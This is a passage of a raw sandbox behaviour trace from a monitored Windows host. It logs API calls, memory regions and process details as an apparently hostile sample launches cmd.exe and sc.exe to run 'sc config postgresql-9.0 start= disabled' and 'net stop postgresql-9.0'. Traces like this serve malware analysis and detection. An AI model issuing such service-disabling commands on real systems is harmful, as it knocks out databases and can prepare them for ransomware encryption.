(in: lpAttributeList=0x462f488, dwFlags=0x0, Attribute=0x60001, lpValue=0x462f474, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x462f488, lpPreviousValue=0x0) returned 1 [0128.752] GetStartupInfoW (in: lpStartupInfo=0x462f4c0 | out: lpStartupInfo=0x462f4c0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.753] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.753] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.754] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config postgresql-9.0 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x462f410*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config postgresql-9.0 start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x462f45c | out: lpCommandLine="sc config postgresql-9.0 start= disabled", lpProcessInformation=0x462f45c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe84, dwThreadId=0xe6c)) returned 1 [0128.760] CloseHandle (hObject=0xa4) returned 1 [0128.760] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.760] GetEnvironmentStringsW () returned 0x4969f00* [0128.760] FreeEnvironmentStringsA (penv="=") returned 1 [0128.760] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0128.804] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x462f3f4 | out: lpExitCode=0x462f3f4*=0x424) returned 1 [0128.805] CloseHandle (hObject=0xa8) returned 1 [0128.805] _vsnwprintf (in: _Buffer=0x462f4dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x462f3fc | out: _Buffer="00000424") returned 8 [0128.805] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0128.805] GetEnvironmentStringsW () returned 0x496b378* [0128.805] FreeEnvironmentStringsA (penv="=") returned 1 [0128.805] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.805] GetEnvironmentStringsW () returned 0x496b378* [0128.805] FreeEnvironmentStringsA (penv="=") returned 1 [0128.805] DeleteProcThreadAttributeList (in: lpAttributeList=0x462f488 | out: lpAttributeList=0x462f488) [0128.805] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.805] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0128.805] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.805] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0128.805] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.805] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0128.806] SetConsoleInputExeNameW () returned 0x1 [0128.806] GetConsoleOutputCP () returned 0x1b5 [0128.806] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.806] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.806] exit (_Code=1060) Thread: id = 413 os_tid = 0xe70 Process: id = "110" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x25b32000" os_pid = "0xe94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "109" os_parent_pid = "0xe98" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6446 start_va = 0x7f94e000 end_va = 0x7f94efff entry_point = 0x0 region_type = private name = "private_0x000000007f94e000" filename = "" Region: id = 6447 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6448 start_va = 0xa6fab60000 end_va = 0xa6fab7ffff entry_point = 0x0 region_type = private name = "private_0x000000a6fab60000" filename = "" Region: id = 6449 start_va = 0xa6fab80000 end_va = 0xa6fab93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a6fab80000" filename = "" Region: id = 6450 start_va = 0xa6faba0000 end_va = 0xa6fabdffff entry_point = 0x0 region_type = private name = "private_0x000000a6faba0000" filename = "" Region: id = 6451 start_va = 0x7df5fff20000 end_va = 0x7ff5fff1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff20000" filename = "" Region: id = 6452 start_va = 0x7ff6c3a30000 end_va = 0x7ff6c3a52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3a30000" filename = "" Region: id = 6453 start_va = 0x7ff6c3a5d000 end_va = 0x7ff6c3a5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a5d000" filename = "" Region: id = 6454 start_va = 0x7ff6c3a5e000 end_va = 0x7ff6c3a5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a5e000" filename = "" Region: id = 6455 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6456 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6457 start_va = 0xa6fab60000 end_va = 0xa6fab6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a6fab60000" filename = "" Region: id = 6458 start_va = 0xa6fab70000 end_va = 0xa6fab76fff entry_point = 0x0 region_type = private name = "private_0x000000a6fab70000" filename = "" Region: id = 6459 start_va = 0xa6fabe0000 end_va = 0xa6fac1ffff entry_point = 0x0 region_type = private name = "private_0x000000a6fabe0000" filename = "" Region: id = 6460 start_va = 0xa6fac20000 end_va = 0xa6fad1ffff entry_point = 0x0 region_type = private name = "private_0x000000a6fac20000" filename = "" Region: id = 6461 start_va = 0xa6fad20000 end_va = 0xa6fadddfff entry_point = 0xa6fad20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6462 start_va = 0xa6fade0000 end_va = 0xa6fade0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a6fade0000" filename = "" Region: id = 6463 start_va = 0xa6fadf0000 end_va = 0xa6fadf6fff entry_point = 0x0 region_type = private name = "private_0x000000a6fadf0000" filename = "" Region: id = 6464 start_va = 0xa6fae00000 end_va = 0xa6fae00fff entry_point = 0x0 region_type = private name = "private_0x000000a6fae00000" filename = "" Region: id = 6465 start_va = 0xa6fae10000 end_va = 0xa6fae10fff entry_point = 0x0 region_type = private name = "private_0x000000a6fae10000" filename = "" Region: id = 6466 start_va = 0xa6faf50000 end_va = 0xa6faf5ffff entry_point = 0x0 region_type = private name = "private_0x000000a6faf50000" filename = "" Region: id = 6467 start_va = 0xa6faf60000 end_va = 0xa6fb0e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a6faf60000" filename = "" Region: id = 6468 start_va = 0xa6fb0f0000 end_va = 0xa6fb270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a6fb0f0000" filename = "" Region: id = 6469 start_va = 0xa6fb280000 end_va = 0xa6fc67ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a6fb280000" filename = "" Region: id = 6470 start_va = 0x7ff6c3930000 end_va = 0x7ff6c3a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3930000" filename = "" Region: id = 6471 start_va = 0x7ff6c3a5b000 end_va = 0x7ff6c3a5cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a5b000" filename = "" Region: id = 6472 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6473 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6474 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6475 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6476 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6477 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6478 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6479 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6480 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6481 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6482 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6483 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6484 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6485 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 410 os_tid = 0xe90 Thread: id = 411 os_tid = 0xe88 Thread: id = 412 os_tid = 0xe80 Process: id = "111" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x260ab000" os_pid = "0xe84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "109" os_parent_pid = "0xe98" cmd_line = "sc config postgresql-9.0 start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6499 start_va = 0xa60000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 6500 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 6501 start_va = 0xa90000 end_va = 0xaa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 6502 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 6503 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 6504 start_va = 0xb30000 end_va = 0xb33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 6505 start_va = 0xb40000 end_va = 0xb40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 6506 start_va = 0xb50000 end_va = 0xb51fff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 6507 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 6508 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 6509 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6510 start_va = 0x7e7d0000 end_va = 0x7e7f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7d0000" filename = "" Region: id = 6511 start_va = 0x7e7f7000 end_va = 0x7e7f7fff entry_point = 0x0 region_type = private name = "private_0x000000007e7f7000" filename = "" Region: id = 6512 start_va = 0x7e7fb000 end_va = 0x7e7fdfff entry_point = 0x0 region_type = private name = "private_0x000000007e7fb000" filename = "" Region: id = 6513 start_va = 0x7e7fe000 end_va = 0x7e7fefff entry_point = 0x0 region_type = private name = "private_0x000000007e7fe000" filename = "" Region: id = 6514 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6515 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6516 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6517 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6518 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6519 start_va = 0xd10000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 6520 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6521 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6522 start_va = 0xbf0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 6523 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6524 start_va = 0xa60000 end_va = 0xa6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 6525 start_va = 0xa70000 end_va = 0xa73fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 6526 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 6527 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 6528 start_va = 0xd20000 end_va = 0xdddfff entry_point = 0xd20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6529 start_va = 0xe10000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 6530 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6531 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6532 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6533 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6534 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6535 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6536 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6537 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6538 start_va = 0x7e6d0000 end_va = 0x7e7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6d0000" filename = "" Region: id = 6539 start_va = 0x7e7f8000 end_va = 0x7e7fafff entry_point = 0x0 region_type = private name = "private_0x000000007e7f8000" filename = "" Region: id = 6540 start_va = 0x4ea0000 end_va = 0x4f7efff entry_point = 0x4ea0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 6541 start_va = 0xcf0000 end_va = 0xd01fff entry_point = 0xcf0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 414 os_tid = 0xe6c [0128.793] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0128.793] __set_app_type (_Type=0x1) [0128.793] __p__fmode () returned 0x77ac4d6c [0128.793] __p__commode () returned 0x77ac5b1c [0128.793] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0128.793] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0128.793] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.796] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.796] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0128.796] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0128.796] _wcsicmp (_String1="config", _String2="query") returned -14 [0128.796] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0128.796] _wcsicmp (_String1="config", _String2="start") returned -16 [0128.796] _wcsicmp (_String1="config", _String2="pause") returned -13 [0128.796] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0128.796] _wcsicmp (_String1="config", _String2="control") returned -14 [0128.796] _wcsicmp (_String1="config", _String2="continue") returned -14 [0128.796] _wcsicmp (_String1="config", _String2="stop") returned -16 [0128.796] _wcsicmp (_String1="config", _String2="config") returned 0 [0128.796] ResolveDelayLoadedAPI () returned 0x77262c10 [0128.796] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xbf8540 [0128.798] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0128.798] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0128.798] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0128.798] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0128.798] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0128.798] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0128.798] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0128.798] OpenServiceW (hSCManager=0xbf8540, lpServiceName="postgresql-9.0", dwDesiredAccess=0x3) returned 0x0 [0128.798] GetLastError () returned 0x424 [0128.798] _ultow (in: _Dest=0x424, _Radix=11730216 | out: _Dest=0x424) returned="1060" [0128.798] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0128.800] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xb2fd04, nSize=0x2, Arguments=0xb2fd1c | out: lpBuffer="裐¿﵄²蔔è") returned 0x62 [0128.800] GetFileType (hFile=0x3c) returned 0x2 [0128.800] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xb2fce8 | out: lpMode=0xb2fce8) returned 1 [0128.800] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xbf88d0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb2fcf8, lpReserved=0x0 | out: lpBuffer=0xbf88d0*, lpNumberOfCharsWritten=0xb2fcf8*=0x62) returned 1 [0128.801] LocalFree (hMem=0xbf88d0) returned 0x0 [0128.801] LocalFree (hMem=0x0) returned 0x0 [0128.801] CloseServiceHandle (hSCObject=0xbf8540) returned 1 [0128.801] LocalFree (hMem=0x0) returned 0x0 [0128.801] exit (_Code=1060) Thread: id = 415 os_tid = 0xe7c Process: id = "112" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x25f2e000" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop postgresql-9.0" cur_dir = 